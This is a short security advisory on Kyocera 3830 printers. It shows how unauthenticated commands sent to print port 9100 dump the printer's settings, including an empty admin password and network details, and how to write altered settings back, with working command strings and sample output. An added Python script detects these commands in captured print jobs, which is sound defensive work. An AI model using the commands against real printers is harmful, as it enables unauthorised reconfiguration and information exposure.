Kyoceraprinters.txt

Posted Feb 20, 2006
Authored by evader | Site evader.wordpress.com

It is possible to gain administrative access on Kyocera 3830 printers by using telnet.

tags | advisory
SHA-256 | 7aeebf751b381ae2252541ba8745ebca6d719e929fef24288eb300f0b88b85f5

Kyocera Printers

Kyocera printers have various security flaws. Most of them can be telnetted to on the default port and accessed with the default username "admin" and a blank password. There is a very decent menu interface to change everything.

For the Kyocera 3830, which is a current model workgroup printer, they disabled telnetting to the default port for "security".
These printers, if they can be accessed, can provide up to around 100 MB of storage, email facilities, networking information and various other details.

The 3830s have a back door. Telnetting to port 9100 (the printer data port) allows you to send raw text to the printer, but if you drop the correct command in at this point, you can get full access to the printer's settings. So here we go.

Telnet to port 9100 of a 3830.

Drop in this command and save the output:

!R!SIOP0,"COMREADBACK:0";EXIT;

This will give you output similar to this:

CMNT Offset 0x006a Size = 1 ; SIOP0,"CUSTOM:Network Status Page = 0";
CMNT Offset 0x006b Size = 1 ; SIOP0,"CUSTOM:TCP/IP BOOTP = 0";
CMNT Offset 0x006c Size = 1 ; SIOP0,"CUSTOM:TCP/IP Protocol = 1";
CMNT Offset 0x006d Size = 1 ; SIOP0,"CUSTOM:TCP/IP DHCP = 0";
CMNT Offset 0x006e Size = 1 ; SIOP0,"CUSTOM:RARP = 1";
CMNT Offset 0x006f Size = 1 ; SIOP0,"CUSTOM:ARP/PING = 1";
CMNT Offset 0x0070 Size = 4 ; SIOP0,"CUSTOM:IP Address = 172.16.1.212";
CMNT Offset 0x0074 Size = 4 ; SIOP0,"CUSTOM:Subnet Mask = 255.255.255.0";
CMNT Offset 0x0078 Size = 4 ; SIOP0,"CUSTOM:Default Gateway = 0.0.0.0";
CMNT Offset 0x007c Size = 256 ; SIOP0,"CUSTOM:Domain Name = ''";
CMNT Offset 0x017c Size = 4 ; SIOP0,"CUSTOM:DNS Server (Primary) = 0.0.0.0";
CMNT Offset 0x0180 Size = 4 ; SIOP0,"CUSTOM:DNS Server (Secondary) = 0.0.0.0";
CMNT Offset 0x0184 Size = 4 ; SIOP0,"CUSTOM:WINS Server (Primary) = 0.0.0.0";
CMNT Offset 0x0188 Size = 4 ; SIOP0,"CUSTOM:WINS Server (Secondary) = 0.0.0.0";
CMNT Offset 0x018c Size = 225 ; SIOP0,"CUSTOM:Scope ID = ''";
CMNT Offset 0x026d Size = 1 ; SIOP0,"CUSTOM:NetWare Protocol = 1";
CMNT Offset 0x026e Size = 1 ; SIOP0,"CUSTOM:Frame Type = 1";
CMNT Offset 0x026f Size = 1 ; SIOP0,"CUSTOM:Operation Mode = 1";
CMNT Offset 0x0270 Size = 32 ; SIOP0,"CUSTOM:Print Server Name = 'admin'";
CMNT Offset 0x0290 Size = 32 ; SIOP0,"CUSTOM:Login Password = ''";
CMNT Offset 0x02b0 Size = 2 ; SIOP0,"CUSTOM:Queue Polling Interval = 4";
CMNT Offset 0x02b2 Size = 1 ; SIOP0,"CUSTOM:NetWare Banner Page = 1";
CMNT Offset 0x02b3 Size = 1 ; SIOP0,"CUSTOM:Bindery Mode = 1";
CMNT Offset 0x02b4 Size = 32 ; SIOP0,"CUSTOM:File Server 1 = ''";

Now, if you want to change a setting, just grab the part after the "offset ;" section, insert your own text/IP address/whatever and throw it back onto the 9100 connection.

!R!SIOP0,"CUSTOM:LP1 End of Job String = '!R! RES; EXIT;'";EXIT;

Your other option is to stick all the commands in a text file, then do this from the Unix prompt (without quotes):

lp -d"printername" "textfilename"

Done and done.
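
For defenders, print jobs captured on TCP 9100 or held in a spool directory can be checked for the embedded SIOP0 command strings shown above, since a settings readback or change arrives as ordinary job data. The following Python is an added example, not part of the original advisory; the function name, the sample job and its 192.0.2.10 address are constructed, and it assumes the string arguments are written with straight quotes.

```python
import re

# Constructed sample job data (not a real capture). The commands follow the
# form shown in the advisory; the IP address is a documentation placeholder.
SAMPLE_JOB = (
    b"Quarterly report, page 1\r\n"
    b'!R!SIOP0,"COMREADBACK:0";EXIT;\r\n'
    b"ordinary text between commands\r\n"
    b'!R! SIOP0,"CUSTOM:IP Address = 192.0.2.10";EXIT;\r\n'
    b"!R!SIOP0,\"CUSTOM:LP1 End of Job String = '!R! RES; EXIT;'\";EXIT;\r\n"
)

# SIOP<n>,"<argument>"; where the argument may itself contain a quoted string
# with "EXIT;" inside it, so we match on the outer quote rather than on EXIT.
SIOP_RE = re.compile(rb"SIOP\s*(\d+)\s*,\s*([\"'])(.*?)\2\s*;", re.S | re.I)


def find_siop(payload: bytes):
    """Return (kind, name, value) tuples for SIOP commands in job data.

    kind is "readback" for a settings dump request, "change" for a
    CUSTOM:<name> = <value> assignment, and "other" for anything else.
    Nothing is reported unless the "!R!" command prefix is present.
    """
    findings = []
    start = payload.find(b"!R!")
    if start < 0:
        return findings
    for match in SIOP_RE.finditer(payload, start):
        arg = match.group(3).decode("latin-1")
        upper = arg.upper()
        if upper.startswith("COMREADBACK"):
            findings.append(("readback", arg, None))
        elif upper.startswith("CUSTOM:"):
            name, _, value = arg[len("CUSTOM:"):].partition("=")
            findings.append(("change", name.strip(), value.strip()))
        else:
            findings.append(("other", arg, None))
    return findings


if __name__ == "__main__":
    for kind, name, value in find_siop(SAMPLE_JOB):
        print(f"{kind:8} {name!r} -> {value!r}")
```

Any "change" or "readback" finding in a job that did not come from the printer's administrator is worth investigating, as is a "Login Password" value that reads back empty.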
